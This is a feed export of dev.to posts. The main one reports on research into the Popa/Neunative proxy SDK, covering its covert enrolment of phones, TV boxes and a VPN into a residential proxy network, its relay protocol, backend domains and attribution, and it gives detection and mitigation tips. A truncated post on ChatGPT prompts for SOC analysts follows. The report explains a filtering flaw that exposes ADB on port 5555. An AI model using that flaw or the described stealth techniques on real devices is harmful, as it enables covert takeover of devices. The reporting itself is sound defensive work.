🔗 &lt;strong&gt;&lt;a href="https://excalibra.github.io/cybersecurity-interview-questions/" rel="noopener noreferrer"&gt;excalibra.github.io/cybersecurity-interview-questions&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
🔗 &lt;strong&gt;&lt;a href="https://github.com/Excalibra/cybersecurity-interview-questions" rel="noopener noreferrer"&gt;github.com/Excalibra/cybersecurity-interview-questions&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;If this helped you, please consider giving it a star ⭐ — it makes a huge difference in helping others find it.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>career</category>
      <category>opensource</category>
      <category>interview</category>
    </item>
    <item>
      <title>Exposure of a Botnet Linked to an Israeli Listed Company</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Thu, 23 Jul 2026 19:48:34 +0000</pubDate>
      <link>https://dev.to/excalibra/exposure-of-a-botnet-linked-to-an-israeli-listed-company-30jb</link>
      <guid>https://dev.to/excalibra/exposure-of-a-botnet-linked-to-an-israeli-listed-company-30jb</guid>
      <description>&lt;p&gt;&lt;strong&gt;Article Summary:&lt;/strong&gt; A proxy software development kit (SDK) named Popa has been exposed, capable of transforming mobile phones, TV boxes, and other devices into residential proxy network nodes. The SDK is distributed through pirated applications, counterfeit boxes, and bundled installations across Android and Windows platforms. Its operations are highly stealthy, employing dynamic configuration to evade blocks and utilising proprietary protocols for communication with backend servers. Notably, this infrastructure shows deep connections with NetNut, a residential proxy provider under the Israeli listed company Alarum Technologies. The report indicates the network maintains millions of active IPs daily and is used for activities such as AI data scraping, posing risks to user device security and enterprise networks.  &lt;/p&gt;




&lt;p&gt;Many users remain unaware that their mobile phones or home TV boxes may be quietly integrated into commercial residential proxy networks in the background, forwarding network traffic for third parties.&lt;/p&gt;

&lt;p&gt;On 18 June 2026, Synthient, Nokia Deepfield, Qurium Media Foundation, and KrebsOnSecurity simultaneously released research reports that fully exposed the ecosystem surrounding the Popa and Neunative proxy SDKs.&lt;/p&gt;

&lt;p&gt;This SDK spans Android and Windows platforms. It is implanted via pirated streaming applications, counterfeit TV boxes, download tools, and other channels, ultimately feeding into the same residential proxy infrastructure. This network maintains deep ties with NetNut, the residential proxy service under the listed company Alarum Technologies.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ft8qaf5xksecwb4fxe9t5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ft8qaf5xksecwb4fxe9t5.png" alt=" " width="800" height="336"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Popa: A Multi-Platform Proxy SDK Family
&lt;/h2&gt;

&lt;p&gt;Popa is not a single malicious program but a long-evolving family of proxy software development kits. Its core objective is to convert ordinary consumer devices into exit nodes for residential proxy networks. Over years of iteration, it has developed a comprehensive matrix across multiple languages, platforms, and brands, with variants tailored to different implantation scenarios.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Branch Name&lt;/th&gt;
&lt;th&gt;Package Name&lt;/th&gt;
&lt;th&gt;Development Language&lt;/th&gt;
&lt;th&gt;Earliest Sample Date&lt;/th&gt;
&lt;th&gt;Primary Platforms&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Moneytiser&lt;/td&gt;
&lt;td&gt;io.moneytise&lt;/td&gt;
&lt;td&gt;Java&lt;/td&gt;
&lt;td&gt;December 2020&lt;/td&gt;
&lt;td&gt;Android&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Popa&lt;/td&gt;
&lt;td&gt;io.popanet&lt;/td&gt;
&lt;td&gt;Java&lt;/td&gt;
&lt;td&gt;March 2022&lt;/td&gt;
&lt;td&gt;Android&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Loopop&lt;/td&gt;
&lt;td&gt;io.nn.lp&lt;/td&gt;
&lt;td&gt;Java&lt;/td&gt;
&lt;td&gt;November 2023&lt;/td&gt;
&lt;td&gt;Android&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Neupop / Neunative&lt;/td&gt;
&lt;td&gt;io.nn.neunative / NeunativeWin.dll&lt;/td&gt;
&lt;td&gt;C++&lt;/td&gt;
&lt;td&gt;February 2026&lt;/td&gt;
&lt;td&gt;Android, Windows&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The SDK’s distribution channels cover a broad range of consumer devices; virtually any terminal capable of installing third-party applications may serve as a carrier.&lt;/p&gt;

&lt;p&gt;Android devices are the primary target. The Vo1d botnet infects large numbers of counterfeit TV boxes and implants Popa plugins. Additionally, numerous pirated streaming applications actively bundle the SDK, including Ocean Streamz, CyberFlix, Flixoid, Sportzfy, and dozens of other popular titles. Users installing these applications inadvertently join the proxy network. (Initial discovery referenced from XLab: &lt;a href="https://blog.xlab.qianxin.com/long-live-the-vo1d_botnet/" rel="noopener noreferrer"&gt;https://blog.xlab.qianxin.com/long-live-the-vo1d_botnet/&lt;/a&gt;)&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7dx7a5xlinj3plqosp96.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7dx7a5xlinj3plqosp96.png" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Even the open-source application Smart Tube was compromised, with the proxy SDK inserted across multiple versions for five months before community detection. On Windows, prominent examples include RoboVPN — a commercial VPN marketed for privacy protection — which bundles the complete Neunative proxy SDK via NuGet dependencies in its installer. The well-known BitTorrent client MediaGet similarly incorporates the SDK, automatically enrolling users’ devices into the proxy pool upon installation.&lt;/p&gt;

&lt;p&gt;Smart TV platforms have also seen significant penetration. According to Spur research, 42.5% of applications on LG webOS and 26.5% on Samsung Tizen contain similar proxy SDKs. Installing a simple game or utility application can transform a household television into a permanently online proxy node.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stealth Design of the Android Popa SDK
&lt;/h2&gt;

&lt;p&gt;In newer Popa versions, the SDK avoids hard-coded command-and-control server addresses. Instead, it dynamically fetches configuration from public cloud storage. Specifically, it contains a built-in download link pointing to Google Drive; the file is encrypted with AES-ECB, and decryption reveals the real relay server addresses.&lt;/p&gt;

&lt;p&gt;This approach of hosting configuration on mainstream cloud services substantially enhances infrastructure resilience and circumvents conventional domain blocking. Device registration and network enrolment occur in two stages. First, a qualification check: upon launch, the SDK queries an initial interface, and the server determines whether the device meets enrolment criteria, filtering out unsuitable devices. Second, node list acquisition: verified devices call the registration interface, receive a list of available relay servers, establish connections, and begin forwarding traffic.&lt;/p&gt;

&lt;p&gt;Although recent SDK versions include interfaces for user consent dialogues, developers rarely invoke this functionality in practice. Qurium’s static analysis confirmed the presence of complete consent dialogue components within the code, yet no call paths from the startup process to these dialogues exist. Devices proceed directly to registration upon boot without notifying the user.&lt;/p&gt;

&lt;h2&gt;
  
  
  Windows Neunative SDK
&lt;/h2&gt;

&lt;p&gt;Nokia Deepfield’s reverse engineering of RoboVPN fully details the operation of the Windows Neunative SDK, revealing stealth far exceeding the Android variant. The RoboVPN client itself provides full VPN functionality via WireGuard protocol, supporting country selection, speed testing, and standard features.&lt;/p&gt;

&lt;p&gt;The proxy SDK is embedded as a NuGet dependency, indistinguishable in the installation manifest from ordinary components such as JSON parsing libraries. Its activation logic is particularly deceptive: the SDK does not run during VPN connections. Instead, it activates only when the VPN is disconnected or the client is idle after login, preceded by a random delay of 30 to 90 minutes. Reconnecting the VPN immediately halts the proxy service.&lt;/p&gt;

&lt;p&gt;This design serves a clear purpose. WireGuard operates in full-tunnel mode; simultaneous proxy operation during VPN connectivity would route exit traffic through datacentre IPs, undermining residential proxy value. Activation solely during VPN disconnection ensures forwarded traffic originates from genuine residential user IPs, aligning perfectly with commercial residential proxy characteristics. Short-term packet captures by ordinary users are unlikely to detect anomalies, often leading to the erroneous conclusion that the software is clean.&lt;/p&gt;

&lt;h2&gt;
  
  
  Proprietary Relay Protocol and Security Vulnerabilities
&lt;/h2&gt;

&lt;p&gt;The Neunative core consists of a 194 KB x64 C++ binary containing 598 functions. It relies on the system Schannel library for TLS encryption without additional cryptographic bundles. Communication utilises a custom binary TLV (Type-Length-Value) protocol, with messages distinguished by 4-byte type codes across seven core message types:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Registration message – for device enrolment to relay nodes
&lt;/li&gt;
&lt;li&gt;Registration response – returning enrolment results
&lt;/li&gt;
&lt;li&gt;Heartbeat message – maintaining connection liveness
&lt;/li&gt;
&lt;li&gt;Open tunnel instruction – carrying target hostname and port
&lt;/li&gt;
&lt;li&gt;Tunnel data – carrying forwarded raw traffic
&lt;/li&gt;
&lt;li&gt;Close tunnel instruction – terminating a specified tunnel
&lt;/li&gt;
&lt;li&gt;Disconnect message – normal connection termination
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Upon receiving an open-tunnel instruction, the SDK spawns an independent thread, resolves the target domain and port, establishes a direct connection, and performs bidirectional data forwarding between the relay server and destination. The SDK includes destination address filtering to block private, loopback, link-local, and multicast addresses, preventing third-party access to user internal networks. However, this filtering contains clear deficiencies: it does not block the 0.0.0.0/8 range and lacks any port blacklist. On Android, accessing port 5555 on 0.0.0.0 directly targets the device’s ADB debugging service, enabling attackers to compromise the device and convert proxy nodes into botnet zombies. Observations indicate that port 5555 ranks as the third most active outbound port across the Popa network, confirming such attacks are occurring in the wild.&lt;/p&gt;

&lt;h2&gt;
  
  
  Two-Tier Backend Infrastructure
&lt;/h2&gt;

&lt;p&gt;Qurium and Nokia’s investigations jointly reconstruct the backend’s full scale. The network employs a two-tier architecture of a scheduling layer and relay layer. The top tier features load-balancing domains, with lb.gmslb.net as the primary enrolment entry point backed by ten servers in OVH datacentres. Devices register here and receive geographically matched relay node lists. The lower tier comprises relay node clusters using numbered domains with numerous fronting domains.&lt;/p&gt;

&lt;p&gt;A single relay server may correspond to up to 30 different fronting domains such as viki-play.com and star-layer.com. All domains are hosted on Cloudflare under two accounts to avoid single-point failure from blocks. Domain names mimic legitimate technology products through compound English words, enhancing deception. Enumeration of numbered domains reveals approximately 360 active relay servers, all deployed in commercial datacentres (OVH, GTHost, Hetzner, Linode) with none being residential nodes.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzudr90dxgmalumz6b36k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzudr90dxgmalumz6b36k.png" alt=" " width="800" height="647"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The true residential exits are the compromised user devices implanted with the SDK.&lt;/p&gt;

&lt;h2&gt;
  
  
  Two Faces of the Same Backend: Botnet and Commercial Software
&lt;/h2&gt;

&lt;p&gt;Popa first gained public attention as a traffic-forwarding plugin for the Vo1d botnet, which targets Android TV boxes. At disclosure in 2024, Vo1d infected approximately 1.3 million devices, growing to 1.6 million by 2025 across 226 countries and regions. Infected devices download the Popa plugin and contribute to the residential proxy network for profit. Meanwhile, Neunative functions as a commercial SDK embedded in legitimately distributed software such as RoboVPN through voluntary user installation.&lt;/p&gt;

&lt;p&gt;Despite divergent distribution paths, both ultimately connect to identical backend infrastructure. Technical architecture comparison reveals near-identical core relay protocols, message types, and node scheduling logic, with only minor differences in registration ports and interface paths. Windows Neunative build path records confirm the compilation directory was named after the Android native SDK, indicating a cross-platform port of the same codebase. Consequently, a virus-infected counterfeit TV box and a user-installed free VPN on a home computer become exit nodes within the same proxy pool, serving identical paying customers. The backend makes no distinction regarding enrolment method or verification of genuine informed consent.&lt;/p&gt;

&lt;h2&gt;
  
  
  Attribution Chain: From NinjaTech to NetNut
&lt;/h2&gt;

&lt;p&gt;Qurium’s investigation, tracing domain history and corporate records, ultimately points to the well-known residential proxy provider NetNut and its parent company Alarum Technologies. Key evidence emerged from domain transitions. Following Google and security vendors’ 2025 crackdown on Badbox 2.0, which blocked numerous Popa control domains, dozens of replacement domains appeared. Among these, only ninjatech.io was a long-registered domain. Internet Archive records show ninjatech.io as the former website of NinjaTech, promoting bandwidth monetisation SDKs that allow developers to earn from users’ idle bandwidth without displaying advertisements.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhf3xzqj8d4ym2e9rz8vv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhf3xzqj8d4ym2e9rz8vv.png" alt=" " width="800" height="355"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Latvian corporate records indicate NinjaTech SIA was registered in January 2020 under Moshe Yehuda Kramer. Public profiles confirm Kramer as NetNut co-founder, primary architect of its platform, and current Chief Strategy and Innovation Officer plus Senior Vice President of R&amp;amp;D at Alarum Technologies. Multiple infrastructure overlaps exist: early SDK domains such as cyberprotector.online, sdk.netnut.io, and sdk.ninjatech.io shared identical server IPs between 2021 and 2025. Synthient’s controlled testing verified that devices running Popa SDK route exit traffic through NetNut’s commercial gateways.&lt;/p&gt;

&lt;p&gt;In response, Kramer stated that NinjaTech ceased operations years ago, with the SDK code sold and licensed to third parties; subsequent modifications and deployments are unrelated to him or NetNut. He denied registering the 2025 replacement domains or controlling current Popa infrastructure.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9rkte2g3zzmo32wiwj7z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9rkte2g3zzmo32wiwj7z.png" alt=" " width="799" height="584"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fs8mnbp6ubw8n4tzdqat2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fs8mnbp6ubw8n4tzdqat2.png" alt=" " width="799" height="627"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The proxy network’s scale far exceeds common perceptions. Black Lotus Labs (under Lumen) monitoring shows 1.5 to 2.5 million daily active IPs and 250–300 control nodes. Nokia Deepfield sampling from 26 relays estimates 35,000–60,000 clients per relay, suggesting a potentially larger total. Its industry penetration is particularly concerning: NetNut serves as a core residential proxy provider, with numerous downstream resellers amplifying Popa exit IPs across dozens of services.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Flcw19396vuq94rieru09.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Flcw19396vuq94rieru09.png" alt=" " width="800" height="399"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The primary driver of expansion is massive web scraping demand for AI training. Datacentre IPs are easily blocked by anti-bot measures, whereas residential IPs enjoy higher trust. AI companies procure residential proxies at scale for content collection, fuelling demand and the proliferation of grey SDKs. This scraping has produced tangible public impact: in May 2026, the ARIJ independent media website faced massive scraping from 1.35 million IPs across 223 countries and regions originating from this network. Numerous non-profits, academic institutions, and public knowledge bases suffer service degradation or outages.&lt;/p&gt;

&lt;p&gt;Enterprise risks are equally pronounced. Infoblox data indicate 65% of corporate networks exhibit residential proxy-related domain queries, exceeding 90% in pharmaceuticals and food &amp;amp; beverage, and over 60% in government and finance sectors. Personal devices connecting to corporate networks create outbound channels to enterprise IPs; if exploited for attacks, organisations face attribution challenges and reputational damage.&lt;/p&gt;

&lt;p&gt;Alarum Technologies issued a statement asserting the reports contain numerous inaccurate claims and flawed inferences, denying botnet classification. The company maintains the SDK enables legitimate bandwidth sharing without compromising device security, operates a compliant commercial proxy network with full KYC, abuse monitoring, and compliance measures. However, Spur noted that NetNut does not enforce rigorous enterprise verification; individual users require only email and payment, while downstream white-label resellers face minimal checks, often limited to cryptocurrency and temporary email.&lt;/p&gt;

&lt;p&gt;All research teams emphasised analytical boundaries. Evidence derives from sample reverse engineering, network telemetry, and public records. It does not conclusively prove direct NetNut operation of the SDK implantation network, nor rule out downstream reseller or third-party developer violations. Infrastructure and traffic-layer associations are reproducible facts, while precise commercial relationships and intent remain inconclusive.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Windows Detection:&lt;/strong&gt; Users may inspect the registry key &lt;code&gt;HKCU\Software\Neunative&lt;/code&gt; and log files such as &lt;code&gt;NeuNative.log&lt;/code&gt; in the AppData directory to determine potential SDK implantation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Enterprise and Institutional Mitigation:&lt;/strong&gt; Block known Popa and Neunative scheduling domains and relay IPs at network perimeters to prevent enrolment. Enhance monitoring of outbound TLS traffic on port 6000 to identify anomalous relay connections.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The comprehensive exposure of the Popa and Neunative ecosystem has brought long-standing grey areas within the residential proxy industry into sharp focus. From virus-infected TV boxes to user-installed free software, millions of devices are enlisted into commercial proxy networks without owner knowledge, consuming bandwidth and electricity while introducing risks of device compromise and identity theft. As AI data collection demands continue to grow, the residential proxy market will expand, creating further opportunities for similar grey SDKs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;References:&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://synthient.com/blog/popa-from-sourcing-to-distribution" rel="noopener noreferrer"&gt;https://synthient.com/blog/popa-from-sourcing-to-distribution&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/deepfield/public-research/blob/main/reports/2026-06-18-robovpn-neunative.md" rel="noopener noreferrer"&gt;https://github.com/deepfield/public-research/blob/main/reports/2026-06-18-robovpn-neunative.md&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://krebsonsecurity.com/2026/06/popa-botnet-linked-to-publicly-traded-israeli-firm/" rel="noopener noreferrer"&gt;https://krebsonsecurity.com/2026/06/popa-botnet-linked-to-publicly-traded-israeli-firm/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.qurium.org/forensics/finding-popa/" rel="noopener noreferrer"&gt;https://www.qurium.org/forensics/finding-popa/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; The programs and technical methods described in this article are intended solely for legitimate, compliant security research and educational purposes to enhance cybersecurity defences and possess clear technical research attributes. Any unauthorised use for attacks, destruction, or other illegal activities shall result in the perpetrator bearing full legal, civil, and joint liability; this site assumes no liability. Content is published for technical exchange and knowledge sharing. For copyright or other disputes, please contact us via the provided channels.&lt;/p&gt;

</description>
      <category>malware</category>
      <category>mobile</category>
      <category>cybersecurity</category>
      <category>network</category>
    </item>
    <item>
      <title>10 ChatGPT Prompts for Daily Use by L1 SOC Analysts</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Thu, 23 Jul 2026 19:15:26 +0000</pubDate>
      <link>https://dev.to/excalibra/10-chatgpt-prompts-for-daily-use-by-l1-soc-analysts-5g27</link>
      <guid>https://dev.to/excalibra/10-chatgpt-prompts-for-daily-use-by-l1-soc-analysts-5g27</guid>
      <description>&lt;p&gt;&lt;strong&gt;Article Summary:&lt;/strong&gt; This article provides ten practical ChatGPT prompts tailored for L1 SOC analysts, covering scenarios such as alert triage, threat analysis, and documentation. It aims to optimise security incident response workflows. The core value lies in assisting analysts with repetitive tasks including alert summarisation, log anomaly identification, MITRE framework mapping, threat hunting, and executive reporting. It emphasises the need to avoid inputting sensitive data into public AI tools, recommending instead the use of enterprise-grade AI solutions with mandatory human verification of outputs.  &lt;/p&gt;




&lt;p&gt;Security Operations Centre (SOC) analysts must continuously manage vast volumes of security alerts, often under severe time constraints. In addition, they are required to conduct precise investigations, maintain comprehensive documentation, and communicate findings to both technical and non-technical stakeholders. In this context, generative AI tools such as ChatGPT can serve as valuable assistive instruments.&lt;/p&gt;

&lt;p&gt;The table below summarises ten ChatGPT prompts specifically adapted for L1 SOC analysts, suitable for quick reference. These prompts are beneficial not only for junior analysts but also for L2 and L3 analysts, as well as anyone seeking to understand standard incident response procedures. Sensitive data must never be entered into public AI tools. Instead, these prompts may be used to train dedicated AI agents for partial workflow automation.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;No.&lt;/th&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Assistive Function&lt;/th&gt;
&lt;th&gt;Value to SOC Operations&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Security alert summarisation&lt;/td&gt;
&lt;td&gt;Condenses alert data into content suitable for non-technical audiences&lt;/td&gt;
&lt;td&gt;Supports junior analysts in triage and risk-level determination&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Raw log analysis&lt;/td&gt;
&lt;td&gt;Identifies anomalous behaviour, indicators of compromise, and attack patterns&lt;/td&gt;
&lt;td&gt;Aids log tracing and security investigations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Customised triage checklist generation&lt;/td&gt;
&lt;td&gt;Establishes standardised step-by-step investigation processes when no playbook exists&lt;/td&gt;
&lt;td&gt;Assists analysts handling unfamiliar alert types&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Incident ticket documentation&lt;/td&gt;
&lt;td&gt;Organises scattered notes into standardised ticket records&lt;/td&gt;
&lt;td&gt;Improves documentation quality, handover efficiency, and audit compliance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Escalation report drafting&lt;/td&gt;
&lt;td&gt;Produces concise escalation content for L2/L3 analysts&lt;/td&gt;
&lt;td&gt;Reduces redundant communication and enhances collaboration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Phishing email analysis&lt;/td&gt;
&lt;td&gt;Examines risk characteristics in suspicious emails&lt;/td&gt;
&lt;td&gt;Supports threat-level assessment of phishing attempts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;MITRE ATT&amp;amp;CK framework mapping&lt;/td&gt;
&lt;td&gt;Aligns observed behaviours with tactics, techniques, and procedures&lt;/td&gt;
&lt;td&gt;Enriches threat analysis and report quality&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Threat hunting hypothesis generation&lt;/td&gt;
&lt;td&gt;Provides hunting assumptions and follow-up investigation directions&lt;/td&gt;
&lt;td&gt;Enables novice analysts to conduct proactive threat hunting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Security detection rule optimisation&lt;/td&gt;
&lt;td&gt;Outputs detection logic, tuning recommendations, and false-positive mitigation strategies&lt;/td&gt;
&lt;td&gt;Broadens detection coverage and reduces alert fatigue&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Executive summary report writing&lt;/td&gt;
&lt;td&gt;Translates technical content into business-oriented language&lt;/td&gt;
&lt;td&gt;Facilitates clear communication with management and business stakeholders&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Judicious application of ChatGPT and similar AI tools can substantially alleviate repetitive tasks for SOC analysts, including alert summarisation, log anomaly detection, ticket writing, and the translation of technical content into accessible language.&lt;/p&gt;

&lt;p&gt;However, generative AI and intelligent agents cannot fully replace human judgement. They should function as efficiency enhancers, supporting analysts in information synthesis, reducing documentation burdens, and streamlining content interpretation. The prompts below are designed for routine SOC workflows, enabling seamless integration of AI into daily operations.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Security Alert Summarisation
&lt;/h2&gt;

&lt;p&gt;Security tools frequently generate lengthy detection outputs filled with vendor-specific terminology, process details, metadata, and behavioural descriptions. This can impede the efficiency of junior analysts during triage.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; From the perspective of an L1 SOC analyst, summarise the following security alert in plain language. Explain the sequence of events, potential risks, threat severity level, and the three priority investigation steps: [Paste alert, log, or endpoint detection content here].&lt;/p&gt;

&lt;p&gt;ChatGPT can produce a concise abstract explaining the alert’s meaning and associated risks, eliminating the need for manual interpretation of every field and technical term.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Raw Log Anomaly Analysis
&lt;/h2&gt;

&lt;p&gt;Manually reviewing log data line by line is extremely time-consuming, making it difficult for analysts to distinguish normal business activity from potentially malicious behaviour.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; Analyse the following log content. Identify suspicious activities, key indicators, potential attacker behaviours, and recommended follow-up investigation measures: [Paste/upload log data here].&lt;/p&gt;

&lt;p&gt;This prompt assists L1 analysts in spotting anomalous login attempts, repeated failed logins, unusual process executions, suspicious domains, access from atypical geographic locations, or command-and-control communication artefacts. While human verification remains essential, ChatGPT and AI agents can significantly reduce initial investigation time and provide clear directional guidance.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Customised Alert Triage Checklist
&lt;/h2&gt;

&lt;p&gt;When no specific incident response playbook is available, ChatGPT can help L1 analysts apply a consistent, standardised investigation process to various unfamiliar alerts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; Acting as a senior L1 SOC analyst and drawing upon the provided alert information, create a step-by-step triage checklist. Include items to verify, evidence to collect, and criteria for escalation: [Paste/upload alert details here].&lt;/p&gt;

&lt;p&gt;This prompt is particularly useful for scenarios such as suspicious PowerShell execution, anomalous remote logins, phishing attempts, or unusual outbound traffic, offering a standardised starting framework for investigations.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Drafting Standardised Incident Tickets or Updates
&lt;/h2&gt;

&lt;p&gt;Documentation constitutes a core element of SOC work. Analysts must produce clear, structured tickets that accurately record investigation findings, evidence reviewed, actions taken, and current incident status. Poor documentation complicates handovers and can lead to confusion during escalations or post-incident reviews.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; Based on the following investigation details, draft a professional, standardised SOC incident ticket. Keep the content concise and clear, in accordance with ticket requirements, and include findings, actions performed, and current status: [Paste raw notes here].&lt;/p&gt;

&lt;p&gt;This prompt enables analysts to transform fragmented notes into well-organised, professional documentation. It promotes consistency, saves time, and is especially valuable when managing multiple tickets simultaneously.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Drafting Escalation Reports for L2 Teams or Incident Response Units
&lt;/h2&gt;

